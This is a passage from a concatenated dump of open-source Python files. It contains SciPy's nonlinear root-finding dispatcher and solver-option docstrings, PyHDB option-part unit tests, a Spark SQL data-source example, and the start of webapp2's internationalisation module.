this case, it must accept the same arguments as `fun`.
tol : float, optional
Tolerance for termination. For detailed control, use solver-specific
options.
callback : function, optional
Optional callback function. It is called on every iteration as
``callback(x, f)`` where `x` is the current solution and `f`
the corresponding residual. For all methods but 'hybr' and 'lm'.
options : dict, optional
A dictionary of solver options. E.g. `xtol` or `maxiter`, see
:obj:`show_options()` for details.
Returns
-------
sol : OptimizeResult
The solution represented as a ``OptimizeResult`` object.
Important attributes are: ``x`` the solution array, ``success`` a
Boolean flag indicating if the algorithm exited successfully and
``message`` which describes the cause of the termination. See
`OptimizeResult` for a description of other attributes.
See also
--------
show_options : Additional options accepted by the solvers
Notes
-----
This section describes the available solvers that can be selected by the
'method' parameter. The default method is *hybr*.
Method *hybr* uses a modification of the Powell hybrid method as
implemented in MINPACK [1]_.
Method *lm* solves the system of nonlinear equations in a least squares
sense using a modification of the Levenberg-Marquardt algorithm as
implemented in MINPACK [1]_.
Method *df-sane* is a derivative-free spectral method. [3]_
Methods *broyden1*, *broyden2*, *anderson*, *linearmixing*,
*diagbroyden*, *excitingmixing*, *krylov* are inexact Newton methods,
with backtracking or full line searches [2]_. Each method corresponds
to a particular Jacobian approximations. See `nonlin` for details.
- Method *broyden1* uses Broyden's first Jacobian approximation, it is
known as Broyden's good method.
- Method *broyden2* uses Broyden's second Jacobian approximation, it
is known as Broyden's bad method.
- Method *anderson* uses (extended) Anderson mixing.
- Method *Krylov* uses Krylov approximation for inverse Jacobian. It
is suitable for large-scale problem.
- Method *diagbroyden* uses diagonal Broyden Jacobian approximation.
- Method *linearmixing* uses a scalar Jacobian approximation.
- Method *excitingmixing* uses a tuned diagonal Jacobian
approximation.
.. warning::
The algorithms implemented for methods *diagbroyden*,
*linearmixing* and *excitingmixing* may be useful for specific
problems, but whether they will work may depend strongly on the
problem.
.. versionadded:: 0.11.0
References
----------
.. [1] More, Jorge J., Burton S. Garbow, and Kenneth E. Hillstrom.
1980. User Guide for MINPACK-1.
.. [2] C. T. Kelley. 1995. Iterative Methods for Linear and Nonlinear
Equations. Society for Industrial and Applied Mathematics.
<http://www.siam.org/books/kelley/>
.. [3] W. La Cruz, J.M. Martinez, M. Raydan. Math. Comp. 75, 1429 (2006).
Examples
--------
The following functions define a system of nonlinear equations and its
jacobian.
>>> def fun(x):
... return [x[0] + 0.5 * (x[0] - x[1])**3 - 1.0,
... 0.5 * (x[1] - x[0])**3 + x[1]]
>>> def jac(x):
... return np.array([[1 + 1.5 * (x[0] - x[1])**2,
... -1.5 * (x[0] - x[1])**2],
... [-1.5 * (x[1] - x[0])**2,
... 1 + 1.5 * (x[1] - x[0])**2]])
A solution can be obtained as follows.
>>> from scipy import optimize
>>> sol = optimize.root(fun, [0, 0], jac=jac, method='hybr')
>>> sol.x
array([ 0.8411639, 0.1588361])
"""
if not isinstance(args, tuple):
args = (args,)
meth = method.lower()
if options is None:
options = {}
if callback is not None and meth in ('hybr', 'lm'):
warn('Method %s does not accept callback.' % method,
RuntimeWarning)
# fun also returns the jacobian
if not callable(jac) and meth in ('hybr', 'lm'):
if bool(jac):
fun = MemoizeJac(fun)
jac = fun.derivative
else:
jac = None
# set default tolerances
if tol is not None:
options = dict(options)
if meth in ('hybr', 'lm'):
options.setdefault('xtol', tol)
elif meth in ('df-sane',):
options.setdefault('ftol', tol)
elif meth in ('broyden1', 'broyden2', 'anderson', 'linearmixing',
'diagbroyden', 'excitingmixing', 'krylov'):
options.setdefault('xtol', tol)
options.setdefault('xatol', np.inf)
options.setdefault('ftol', np.inf)
options.setdefault('fatol', np.inf)
if meth == 'hybr':
sol = _root_hybr(fun, x0, args=args, jac=jac, **options)
elif meth == 'lm':
sol = _root_leastsq(fun, x0, args=args, jac=jac, **options)
elif meth == 'df-sane':
_warn_jac_unused(jac, method)
sol = _root_df_sane(fun, x0, args=args, callback=callback,
**options)
elif meth in ('broyden1', 'broyden2', 'anderson', 'linearmixing',
'diagbroyden', 'excitingmixing', 'krylov'):
_warn_jac_unused(jac, method)
sol = _root_nonlin_solve(fun, x0, args=args, jac=jac,
_method=meth, _callback=callback,
**options)
else:
raise ValueError('Unknown solver %s' % method)
return sol
def _warn_jac_unused(jac, method):
if jac is not None:
warn('Method %s does not use the jacobian (jac).' % (method,),
RuntimeWarning)
def _root_leastsq(func, x0, args=(), jac=None,
col_deriv=0, xtol=1.49012e-08, ftol=1.49012e-08,
gtol=0.0, maxiter=0, eps=0.0, factor=100, diag=None,
**unknown_options):
"""
Solve for least squares with Levenberg-Marquardt
Options
-------
col_deriv : bool
non-zero to specify that the Jacobian function computes derivatives
down the columns (faster, because there is no transpose operation).
ftol : float
Relative error desired in the sum of squares.
xtol : float
Relative error desired in the approximate solution.
gtol : float
Orthogonality desired between the function vector and the columns
of the Jacobian.
maxiter : int
The maximum number of calls to the function. If zero, then
100*(N+1) is the maximum where N is the number of elements in x0.
epsfcn : float
A suitable step length for the forward-difference approximation of
the Jacobian (for Dfun=None). If epsfcn is less than the machine
precision, it is assumed that the relative errors in the functions
are of the order of the machine precision.
factor : float
A parameter determining the initial step bound
(``factor * || diag * x||``). Should be in interval ``(0.1, 100)``.
diag : sequence
N positive entries that serve as a scale factors for the variables.
"""
_check_unknown_options(unknown_options)
x, cov_x, info, msg, ier = leastsq(func, x0, args=args, Dfun=jac,
full_output=True,
col_deriv=col_deriv, xtol=xtol,
ftol=ftol, gtol=gtol,
maxfev=maxiter, epsfcn=eps,
factor=factor, diag=diag)
sol = OptimizeResult(x=x, message=msg, status=ier,
success=ier in (1, 2, 3, 4), cov_x=cov_x,
fun=info.pop('fvec'))
sol.update(info)
return sol
def _root_nonlin_solve(func, x0, args=(), jac=None,
_callback=None, _method=None,
nit=None, disp=False, maxiter=None,
ftol=None, fatol=None, xtol=None, xatol=None,
tol_norm=None, line_search='armijo', jac_options=None,
**unknown_options):
_check_unknown_options(unknown_options)
f_tol = fatol
f_rtol = ftol
x_tol = xatol
x_rtol = xtol
verbose = disp
if jac_options is None:
jac_options = dict()
jacobian = {'broyden1': nonlin.BroydenFirst,
'broyden2': nonlin.BroydenSecond,
'anderson': nonlin.Anderson,
'linearmixing': nonlin.LinearMixing,
'diagbroyden': nonlin.DiagBroyden,
'excitingmixing': nonlin.ExcitingMixing,
'krylov': nonlin.KrylovJacobian
}[_method]
if args:
if jac:
def f(x):
return func(x, *args)[0]
else:
def f(x):
return func(x, *args)
else:
f = func
x, info = nonlin.nonlin_solve(f, x0, jacobian=jacobian(**jac_options),
iter=nit, verbose=verbose,
maxiter=maxiter, f_tol=f_tol,
f_rtol=f_rtol, x_tol=x_tol,
x_rtol=x_rtol, tol_norm=tol_norm,
line_search=line_search,
callback=_callback, full_output=True,
raise_exception=False)
sol = OptimizeResult(x=x)
sol.update(info)
return sol
def _root_broyden1_doc():
"""
Options
-------
nit : int, optional
Number of iterations to make. If omitted (default), make as many
as required to meet tolerances.
disp : bool, optional
Print status to stdout on every iteration.
maxiter : int, optional
Maximum number of iterations to make. If more are needed to
meet convergence, `NoConvergence` is raised.
ftol : float, optional
Relative tolerance for the residual. If omitted, not used.
fatol : float, optional
Absolute tolerance (in max-norm) for the residual.
If omitted, default is 6e-6.
xtol : float, optional
Relative minimum step size. If omitted, not used.
xatol : float, optional
Absolute minimum step size, as determined from the Jacobian
approximation. If the step size is smaller than this, optimization
is terminated as successful. If omitted, not used.
tol_norm : function(vector) -> scalar, optional
Norm to use in convergence check. Default is the maximum norm.
line_search : {None, 'armijo' (default), 'wolfe'}, optional
Which type of a line search to use to determine the step size in
the direction given by the Jacobian approximation. Defaults to
'armijo'.
jac_options : dict, optional
Options for the respective Jacobian approximation.
alpha : float, optional
Initial guess for the Jacobian is (-1/alpha).
reduction_method : str or tuple, optional
Method used in ensuring that the rank of the Broyden
matrix stays low. Can either be a string giving the
name of the method, or a tuple of the form ``(method,
param1, param2, ...)`` that gives the name of the
method and values for additional parameters.
Methods available:
- ``restart``: drop all matrix columns. Has no
extra parameters.
- ``simple``: drop oldest matrix column. Has no
extra parameters.
- ``svd``: keep only the most significant SVD
components.
Extra parameters:
- ``to_retain``: number of SVD components to
retain when rank reduction is done.
Default is ``max_rank - 2``.
max_rank : int, optional
Maximum rank for the Broyden matrix.
Default is infinity (ie., no rank reduction).
"""
pass
def _root_broyden2_doc():
"""
Options
-------
nit : int, optional
Number of iterations to make. If omitted (default), make as many
as required to meet tolerances.
disp : bool, optional
Print status to stdout on every iteration.
maxiter : int, optional
Maximum number of iterations to make. If more are needed to
meet convergence, `NoConvergence` is raised.
ftol : float, optional
Relative tolerance for the residual. If omitted, not used.
fatol : float, optional
Absolute tolerance (in max-norm) for the residual.
If omitted, default is 6e-6.
xtol : float, optional
Relative minimum step size. If omitted, not used.
xatol : float, optional
Absolute minimum step size, as determined from the Jacobian
approximation. If the step size is smaller than this, optimization
is terminated as successful. If omitted, not used.
tol_norm : function(vector) -> scalar, optional
Norm to use in convergence check. Default is the maximum norm.
line_search : {None, 'armijo' (default), 'wolfe'}, optional
Which type of a line search to use to determine the step size in
the direction given by the Jacobian approximation. Defaults to
'armijo'.
jac_options : dict, optional
Options for the respective Jacobian approximation.
alpha : float, optional
Initial guess for the Jacobian is (-1/alpha).
reduction_method : str or tuple, optional
Method used in ensuring that the rank of the Broyden
matrix stays low. Can either be a string giving the
name of the method, or a tuple of the form ``(method,
param1, param2, ...)`` that gives the name of the
method and values for additional parameters.
Methods available:
- ``restart``: drop all matrix columns. Has no
extra parameters.
- ``simple``: drop oldest matrix column. Has no
extra parameters.
- ``svd``: keep only the most significant SVD
components.
Extra parameters:
- ``to_retain``: number of SVD components to
retain when rank reduction is done.
Default is ``max_rank - 2``.
max_rank : int, optional
Maximum rank for the Broyden matrix.
Default is infinity (ie., no rank reduction).
"""
pass
def _root_anderson_doc():
"""
Options
-------
nit : int, optional
Number of iterations to make. If omitted (default), make as many
as required to meet tolerances.
disp : bool, optional
Print status to stdout on every iteration.
maxiter : int, optional
Maximum number of iterations to make. If more are needed to
meet convergence, `NoConvergence` is raised.
ftol : float, optional
Relative tolerance for the residual. If omitted, not used.
fatol : float, optional
Absolute tolerance (in max-norm) for the residual.
If omitted, default is 6e-6.
xtol : float, optional
Relative minimum step size. If omitted, not used.
xatol : float, optional
Absolute minimum step size, as determined from the Jacobian
approximation. If the step size is smaller than this, optimization
is terminated as successful. If omitted, not used.
tol_norm : function(vector) -> scalar, optional
Norm to use in convergence check. Default is the maximum norm.
line_search : {None, 'armijo' (default), 'wolfe'}, optional
Which type of a line search to use to determine the step size in
the direction given by the Jacobian approximation. Defaults to
'armijo'.
jac_options : dict, optional
Options for the respective Jacobian approximation.
alpha : float, optional
Initial guess for the Jacobian is (-1/alpha).
M : float, optional
Number of previous vectors to retain. Defaults to 5.
w0 : float, optional
Regularization parameter for numerical stability.
Compared to unity, good values of the order of 0.01.
"""
pass
def _root_linearmixing_doc():
"""
Options
-------
nit : int, optional
Number of iterations to make. If omitted (default), make as many
as required to meet tolerances.
disp : bool, optional
Print status to stdout on every iteration.
maxiter : int, optional
Maximum number of iterations to make. If more are needed to
meet convergence, ``NoConvergence`` is raised.
ftol : float, optional
Relative tolerance for the residual. If omitted, not used.
fatol : float, optional
Absolute tolerance (in max-norm) for the residual.
If omitted, default is 6e-6.
xtol : float, optional
Relative minimum step size. If omitted, not used.
xatol : float, optional
Absolute minimum step size, as determined from the Jacobian
approximation. If the step size is smaller than this, optimization
is terminated as successful. If omitted, not used.
tol_norm : function(vector) -> scalar, optional
Norm to use in convergence check. Default is the maximum norm.
line_search : {None, 'armijo' (default), 'wolfe'}, optional
Which type of a line search to use to determine the step size in
the direction given by the Jacobian approximation. Defaults to
'armijo'.
jac_options : dict, optional
Options for the respective Jacobian approximation.
alpha : float, optional
initial guess for the jacobian is (-1/alpha).
"""
pass
def _root_diagbroyden_doc():
"""
Options
-------
nit : int, optional
Number of iterations to make. If omitted (default), make as many
as required to meet tolerances.
disp : bool, optional
Print status to stdout on every iteration.
maxiter : int, optional
Maximum number of iterations to make. If more are needed to
meet convergence, `NoConvergence` is raised.
ftol : float, optional
Relative tolerance for the residual. If omitted, not used.
fatol : float, optional
Absolute tolerance (in max-norm) for the residual.
If omitted, default is 6e-6.
xtol : float, optional
Relative minimum step size. If omitted, not used.
xatol : float, optional
Absolute minimum step size, as determined from the Jacobian
approximation. If the step size is smaller than this, optimization
is terminated as successful. If omitted, not used.
tol_norm : function(vector) -> scalar, optional
Norm to use in convergence check. Default is the maximum norm.
line_search : {None, 'armijo' (default), 'wolfe'}, optional
Which type of a line search to use to determine the step size in
the direction given by the Jacobian approximation. Defaults to
'armijo'.
jac_options : dict, optional
Options for the respective Jacobian approximation.
alpha : float, optional
initial guess for the jacobian is (-1/alpha).
"""
pass
def _root_excitingmixing_doc():
"""
Options
-------
nit : int, optional
Number of iterations to make. If omitted (default), make as many
as required to meet tolerances.
disp : bool, optional
Print status to stdout on every iteration.
maxiter : int, optional
Maximum number of iterations to make. If more are needed to
meet convergence, `NoConvergence` is raised.
ftol : float, optional
Relative tolerance for the residual. If omitted, not used.
fatol : float, optional
Absolute tolerance (in max-norm) for the residual.
If omitted, default is 6e-6.
xtol : float, optional
Relative minimum step size. If omitted, not used.
xatol : float, optional
Absolute minimum step size, as determined from the Jacobian
approximation. If the step size is smaller than this, optimization
is terminated as successful. If omitted, not used.
tol_norm : function(vector) -> scalar, optional
Norm to use in convergence check. Default is the maximum norm.
line_search : {None, 'armijo' (default), 'wolfe'}, optional
Which type of a line search to use to determine the step size in
the direction given by the Jacobian approximation. Defaults to
'armijo'.
jac_options : dict, optional
Options for the respective Jacobian approximation.
alpha : float, optional
Initial Jacobian approximation is (-1/alpha).
alphamax : float, optional
The entries of the diagonal Jacobian are kept in the range
``[alpha, alphamax]``.
"""
pass
def _root_krylov_doc():
"""
Options
-------
nit : int, optional
Number of iterations to make. If omitted (default), make as many
as required to meet tolerances.
disp : bool, optional
Print status to stdout on every iteration.
maxiter : int, optional
Maximum number of iterations to make. If more are needed to
meet convergence, `NoConvergence` is raised.
ftol : float, optional
Relative tolerance for the residual. If omitted, not used.
fatol : float, optional
Absolute tolerance (in max-norm) for the residual.
If omitted, default is 6e-6.
xtol : float, optional
Relative minimum step size. If omitted, not used.
xatol : float, optional
Absolute minimum step size, as determined from the Jacobian
approximation. If the step size is smaller than this, optimization
is terminated as successful. If omitted, not used.
tol_norm : function(vector) -> scalar, optional
Norm to use in convergence check. Default is the maximum norm.
line_search : {None, 'armijo' (default), 'wolfe'}, optional
Which type of a line search to use to determine the step size in
the direction given by the Jacobian approximation. Defaults to
'armijo'.
jac_options : dict, optional
Options for the respective Jacobian approximation.
rdiff : float, optional
Relative step size to use in numerical differentiation.
method : {'lgmres', 'gmres', 'bicgstab', 'cgs', 'minres'} or function
Krylov method to use to approximate the Jacobian.
Can be a string, or a function implementing the same
interface as the iterative solvers in
`scipy.sparse.linalg`.
The default is `scipy.sparse.linalg.lgmres`.
inner_M : LinearOperator or InverseJacobian
Preconditioner for the inner Krylov iteration.
Note that you can use also inverse Jacobians as (adaptive)
preconditioners. For example,
>>> jac = BroydenFirst()
>>> kjac = KrylovJacobian(inner_M=jac.inverse).
If the preconditioner has a method named 'update', it will
be called as ``update(x, f)`` after each nonlinear step,
with ``x`` giving the current point, and ``f`` the current
function value.
inner_tol, inner_maxiter, ...
Parameters to pass on to the "inner" Krylov solver.
See `scipy.sparse.linalg.gmres` for details.
outer_k : int, optional
Size of the subspace kept across LGMRES nonlinear
iterations.
See `scipy.sparse.linalg.lgmres` for details.
"""
pass
| bsd-3-clause |
TwoLaid/PyHDB | tests/parts/test_options.py | 9 | 4931 | # Copyright 2014, 2015 SAP SE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: //www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from io import BytesIO
import pytest
from pyhdb.exceptions import InterfaceError
from pyhdb.protocol.parts import OptionPart
from pyhdb.protocol import constants
def test_not_pack_none_value_items():
class DummyOptionPart(OptionPart):
kind = 126
option_definition = {
# Identifier, (Value, Type)
"int_field": (1, 3),
"bigint_field": (2, 4),
"bool_field": (3, 28)
}
arguments, payload = DummyOptionPart({
"int_field": 123456789,
"bigint_field": None,
"bool_field": True
}).pack_data(constants.MAX_SEGMENT_SIZE)
assert arguments == 2
def test_unknown_option_is_not_packable():
class DummyOptionPart(OptionPart):
kind = 126
option_definition = {
# Identifier, (Value, Type)
"int_field": (1, 3),
}
with pytest.raises(InterfaceError) as excinfo:
DummyOptionPart({
"unknown_option": 12345
}).pack_data(constants.MAX_SEGMENT_SIZE)
assert "Unknown option identifier" in excinfo.exconly()
class TestOptionPartBooleanType(object):
class DummyOptionPart(OptionPart):
kind = 126
option_definition = {
# Identifier, (Value, Type)
"bool_field": (1, 28)
}
def test_pack_true(self):
arguments, payload = self.DummyOptionPart({
"bool_field": True
}).pack_data(constants.MAX_SEGMENT_SIZE)
assert arguments == 1
assert payload == b"\x01\x1C\x01"
def test_pack_false(self):
arguments, payload = self.DummyOptionPart({
"bool_field": False
}).pack_data(constants.MAX_SEGMENT_SIZE)
assert arguments == 1
assert payload == b"\x01\x1C\x00"
def test_unpack_true(self):
options, = self.DummyOptionPart.unpack_data(
1,
BytesIO(b"\x01\x1C\x01")
)
assert options == {"bool_field": True}
def test_unpack_false(self):
options, = self.DummyOptionPart.unpack_data(
1,
BytesIO(b"\x01\x1C\x00")
)
assert options == {"bool_field": False}
class TestOptionPartInt(object):
class DummyOptionPart(OptionPart):
kind = 126
option_definition = {
# Identifier, (Value, Type)
"int_field": (1, 3)
}
def test_pack(self):
arguments, payload = self.DummyOptionPart({
"int_field": 123456
}).pack_data(constants.MAX_SEGMENT_SIZE)
assert arguments == 1
assert payload == b"\x01\x03\x40\xE2\x01\x00"
def test_unpack(self):
options, = self.DummyOptionPart.unpack_data(
1,
BytesIO(b"\x01\x03\x40\xE2\x01\x00")
)
assert options == {"int_field": 123456}
class TestOptionPartBigInt(object):
class DummyOptionPart(OptionPart):
kind = 126
option_definition = {
# Identifier, (Value, Type)
"bigint_field": (1, 4)
}
def test_pack(self):
arguments, payload = self.DummyOptionPart({
"bigint_field": 2**32
}).pack_data(constants.MAX_SEGMENT_SIZE)
assert arguments == 1
assert payload == b"\x01\x04\x00\x00\x00\x00\x01\x00\x00\x00"
def test_unpack(self):
options, = self.DummyOptionPart.unpack_data(
1,
BytesIO(b"\x01\x04\x00\x00\x00\x00\x01\x00\x00\x00")
)
assert options == {"bigint_field": 2**32}
class TestOptionPartString(object):
class DummyOptionPart(OptionPart):
kind = 126
option_definition = {
# Identifier, (Value, Type)
"string_field": (1, 29)
}
def test_pack(self):
arguments, payload = self.DummyOptionPart({
"string_field": u"Hello World"
}).pack_data(constants.MAX_SEGMENT_SIZE)
assert arguments == 1
assert payload == b"\x01\x1d\x0b\x00\x48\x65\x6c\x6c" \
b"\x6f\x20\x57\x6f\x72\x6c\x64"
def test_unpack(self):
options, = self.DummyOptionPart.unpack_data(
1,
BytesIO(
b"\x01\x1d\x0b\x00\x48\x65\x6c\x6c"
b"\x6f\x20\x57\x6f\x72\x6c\x64"
)
)
assert options == {"string_field": u"Hello World"}
| apache-2.0 |
patrick-nicholson/spark | examples/src/main/python/sql/datasource.py | 8 | 7058 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from pyspark.sql import SparkSession
# $example on:schema_merging$
from pyspark.sql import Row
# $example off:schema_merging$
"""
A simple example demonstrating Spark SQL data sources.
Run with:
./bin/spark-submit examples/src/main/python/sql/datasource.py
"""
def basic_datasource_example(spark):
# $example on:generic_load_save_functions$
df = spark.read.load("examples/src/main/resources/users.parquet")
df.select("name", "favorite_color").write.save("namesAndFavColors.parquet")
# $example off:generic_load_save_functions$
# $example on:manual_load_options$
df = spark.read.load("examples/src/main/resources/people.json", format="json")
df.select("name", "age").write.save("namesAndAges.parquet", format="parquet")
# $example off:manual_load_options$
# $example on:direct_sql$
df = spark.sql("SELECT * FROM parquet.`examples/src/main/resources/users.parquet`")
# $example off:direct_sql$
def parquet_example(spark):
# $example on:basic_parquet_example$
peopleDF = spark.read.json("examples/src/main/resources/people.json")
# DataFrames can be saved as Parquet files, maintaining the schema information.
peopleDF.write.parquet("people.parquet")
# Read in the Parquet file created above.
# Parquet files are self-describing so the schema is preserved.
# The result of loading a parquet file is also a DataFrame.
parquetFile = spark.read.parquet("people.parquet")
# Parquet files can also be used to create a temporary view and then used in SQL statements.
parquetFile.createOrReplaceTempView("parquetFile")
teenagers = spark.sql("SELECT name FROM parquetFile WHERE age >= 13 AND age <= 19")
teenagers.show()
# +------+
# | name|
# +------+
# |Justin|
# +------+
# $example off:basic_parquet_example$
def parquet_schema_merging_example(spark):
# $example on:schema_merging$
# spark is from the previous example.
# Create a simple DataFrame, stored into a partition directory
sc = spark.sparkContext
squaresDF = spark.createDataFrame(sc.parallelize(range(1, 6))
.map(lambda i: Row(single=i, double=i ** 2)))
squaresDF.write.parquet("data/test_table/key=1")
# Create another DataFrame in a new partition directory,
# adding a new column and dropping an existing column
cubesDF = spark.createDataFrame(sc.parallelize(range(6, 11))
.map(lambda i: Row(single=i, triple=i ** 3)))
cubesDF.write.parquet("data/test_table/key=2")
# Read the partitioned table
mergedDF = spark.read.option("mergeSchema", "true").parquet("data/test_table")
mergedDF.printSchema()
# The final schema consists of all 3 columns in the Parquet files together
# with the partitioning column appeared in the partition directory paths.
# root
# |-- double: long (nullable = true)
# |-- single: long (nullable = true)
# |-- triple: long (nullable = true)
# |-- key: integer (nullable = true)
# $example off:schema_merging$
def json_dataset_example(spark):
# $example on:json_dataset$
# spark is from the previous example.
sc = spark.sparkContext
# A JSON dataset is pointed to by path.
# The path can be either a single text file or a directory storing text files
path = "examples/src/main/resources/people.json"
peopleDF = spark.read.json(path)
# The inferred schema can be visualized using the printSchema() method
peopleDF.printSchema()
# root
# |-- age: long (nullable = true)
# |-- name: string (nullable = true)
# Creates a temporary view using the DataFrame
peopleDF.createOrReplaceTempView("people")
# SQL statements can be run by using the sql methods provided by spark
teenagerNamesDF = spark.sql("SELECT name FROM people WHERE age BETWEEN 13 AND 19")
teenagerNamesDF.show()
# +------+
# | name|
# +------+
# |Justin|
# +------+
# Alternatively, a DataFrame can be created for a JSON dataset represented by
# an RDD[String] storing one JSON object per string
jsonStrings = ['{"name":"Yin","address":{"city":"Columbus","state":"Ohio"}}']
otherPeopleRDD = sc.parallelize(jsonStrings)
otherPeople = spark.read.json(otherPeopleRDD)
otherPeople.show()
# +---------------+----+
# | address|name|
# +---------------+----+
# |[Columbus,Ohio]| Yin|
# +---------------+----+
# $example off:json_dataset$
def jdbc_dataset_example(spark):
# $example on:jdbc_dataset$
# Note: JDBC loading and saving can be achieved via either the load/save or jdbc methods
# Loading data from a JDBC source
jdbcDF = spark.read \
.format("jdbc") \
.option("url", "jdbc:postgresql:dbserver") \
.option("dbtable", "schema.tablename") \
.option("user", "username") \
.option("password", "password") \
.load()
jdbcDF2 = spark.read \
.jdbc("jdbc:postgresql:dbserver", "schema.tablename",
properties={"user": "username", "password": "password"})
# Saving data to a JDBC source
jdbcDF.write \
.format("jdbc") \
.option("url", "jdbc:postgresql:dbserver") \
.option("dbtable", "schema.tablename") \
.option("user", "username") \
.option("password", "password") \
.save()
jdbcDF2.write \
.jdbc("jdbc:postgresql:dbserver", "schema.tablename",
properties={"user": "username", "password": "password"})
# Specifying create table column data types on write
jdbcDF.write \
.option("createTableColumnTypes", "name CHAR(64), comments VARCHAR(1024)") \
.jdbc("jdbc:postgresql:dbserver", "schema.tablename",
properties={"user": "username", "password": "password"})
# $example off:jdbc_dataset$
if __name__ == "__main__":
spark = SparkSession \
.builder \
.appName("Python Spark SQL data source example") \
.getOrCreate()
basic_datasource_example(spark)
parquet_example(spark)
parquet_schema_merging_example(spark)
json_dataset_example(spark)
jdbc_dataset_example(spark)
spark.stop()
| apache-2.0 |
dcroc16/skunk_works | google_appengine/lib/webapp2-2.5.2/webapp2_extras/i18n.py | 49 | 30343 | # -*- coding: utf-8 -*-
"""
webapp2_extras.i18n
===================
Internationalization support for webapp2.
Several ideas borrowed from tipfy.i18n and Flask-Babel.
:copyright: 2011 by tipfy.org.
:license: Apache Sotware License, see LICENSE for details.
"""
import datetime
import gettext as gettext_stdlib
import babel
from babel import dates
from babel import numbers
from babel import support
try:
# Monkeypatches pytz for gae.
import pytz.gae
except ImportError: # pragma: no cover
pass
import pytz
import webapp2
#: Default configuration values for this module. Keys are:
#:
#: translations_path
#: Path to the translations directory. Default is `locale`.
#:
#: domains
#: List of gettext domains to be used. Default is ``['messages']``.
#:
#: default_locale
#: A locale code to be used as fallback. Default is ``'en_US'``.
#:
#: default_timezone
#: The application default timezone according to the Olson
#: database. Default is ``'UTC'``.
#:
#: locale_selector
#: A function that receives (store, request) and returns a locale
#: to be used for a request. If not defined, uses `default_locale`.
#: Can also be a string in dotted notation to be imported.
#:
#: timezone_selector
#: A function that receives (store, request) and returns a timezone
#: to be used for a request. If not defined, uses `default_timezone`.
#: Can also be a string in dotted notation to be imported.
#:
#: date_formats
#: Default date formats for datetime, date and time.
default_config = {
'translations_path': 'locale',
'domains': ['messages'],
'default_locale': 'en_US',
'default_timezone': 'UTC',
'locale_selector': None,
'timezone_selector': None,
'date_formats': {
'time': 'medium',
'date': 'medium',
'datetime': 'medium',
'time.short': None,
'time.medium': None,
'time.full': None,
'time.long': None,
'time.iso': "HH':'mm':'ss",
'date.short': None,
'date.medium': None,
'date.full': None,
'date.long': None,
'date.iso': "yyyy'-'MM'-'dd",
'datetime.short': None,
'datetime.medium': None,
'datetime.full': None,
'datetime.long': None,
'datetime.iso': "yyyy'-'MM'-'dd'T'HH':'mm':'ssZ",
},
}
NullTranslations = gettext_stdlib.NullTranslations
class I18nStore(object):
"""Internalization store.
Caches loaded translations and configuration to be used between requests.
"""
#: Configuration key.
config_key = __name__
#: A dictionary with all loaded translations.
translations = None
#: Path to where traslations are stored.
translations_path = None
#: Translation domains to merge.
domains = None
#: Default locale code.
default_locale = None
#: Default timezone code.
default_timezone = None
#: Dictionary of default date formats.
date_formats = None
#: A callable that returns the locale for a request.
locale_selector = None
#: A callable that returns the timezone for a request.
timezone_selector = None
def __init__(self, app, config=None):
"""Initializes the i18n store.
:param app:
A :class:`webapp2.WSGIApplication` instance.
:param config:
A dictionary of configuration values to be overridden. See
the available keys in :data:`default_config`.
"""
config = app.config.load_config(self.config_key,
default_values=default_config, user_values=config,
required_keys=None)
self.translations = {}
self.translations_path = config['translations_path']
self.domains = config['domains']
self.default_locale = config['default_locale']
self.default_timezone = config['default_timezone']
self.date_formats = config['date_formats']
self.set_locale_selector(config['locale_selector'])
self.set_timezone_selector(config['timezone_selector'])
def set_locale_selector(self, func):
"""Sets the function that defines the locale for a request.
:param func:
A callable that receives (store, request) and returns the locale
for a request.
"""
if func is None:
self.locale_selector = self.default_locale_selector
else:
if isinstance(func, basestring):
func = webapp2.import_string(func)
# Functions are descriptors, so bind it to this instance with
# __get__.
self.locale_selector = func.__get__(self, self.__class__)
def set_timezone_selector(self, func):
"""Sets the function that defines the timezone for a request.
:param func:
A callable that receives (store, request) and returns the timezone
for a request.
"""
if func is None:
self.timezone_selector = self.default_timezone_selector
else:
if isinstance(func, basestring):
func = webapp2.import_string(func)
self.timezone_selector = func.__get__(self, self.__class__)
def default_locale_selector(self, request):
return self.default_locale
def default_timezone_selector(self, request):
return self.default_timezone
def get_translations(self, locale):
"""Returns a translation catalog for a locale.
:param locale:
A locale code.
:returns:
A ``babel.support.Translations`` instance, or
``gettext.NullTranslations`` if none was found.
"""
trans = self.translations.get(locale)
if not trans:
locales = (locale, self.default_locale)
trans = self.load_translations(self.translations_path, locales,
self.domains)
if not webapp2.get_app().debug:
self.translations[locale] = trans
return trans
def load_translations(self, dirname, locales, domains):
"""Loads a translation catalog.
:param dirname:
Path to where translations are stored.
:param locales:
A list of locale codes.
:param domains:
A list of domains to be merged.
:returns:
A ``babel.support.Translations`` instance, or
``gettext.NullTranslations`` if none was found.
"""
trans = None
trans_null = None
for domain in domains:
_trans = support.Translations.load(dirname, locales, domain)
if isinstance(_trans, NullTranslations):
trans_null = _trans
continue
elif trans is None:
trans = _trans
else:
trans.merge(_trans)
return trans or trans_null or NullTranslations()
class I18n(object):
"""Internalization provider for a single request."""
#: A reference to :class:`I18nStore`.
store = None
#: The current locale code.
locale = None
#: The current translations.
translations = None
#: The current timezone code.
timezone = None
#: The current tzinfo object.
tzinfo = None
def __init__(self, request):
"""Initializes the i18n provider for a request.
:param request:
A :class:`webapp2.Request` instance.
"""
self.store = store = get_store(app=request.app)
self.set_locale(store.locale_selector(request))
self.set_timezone(store.timezone_selector(request))
def set_locale(self, locale):
"""Sets the locale code for this request.
:param locale:
A locale code.
"""
self.locale = locale
self.translations = self.store.get_translations(locale)
def set_timezone(self, timezone):
"""Sets the timezone code for this request.
:param timezone:
A timezone code.
"""
self.timezone = timezone
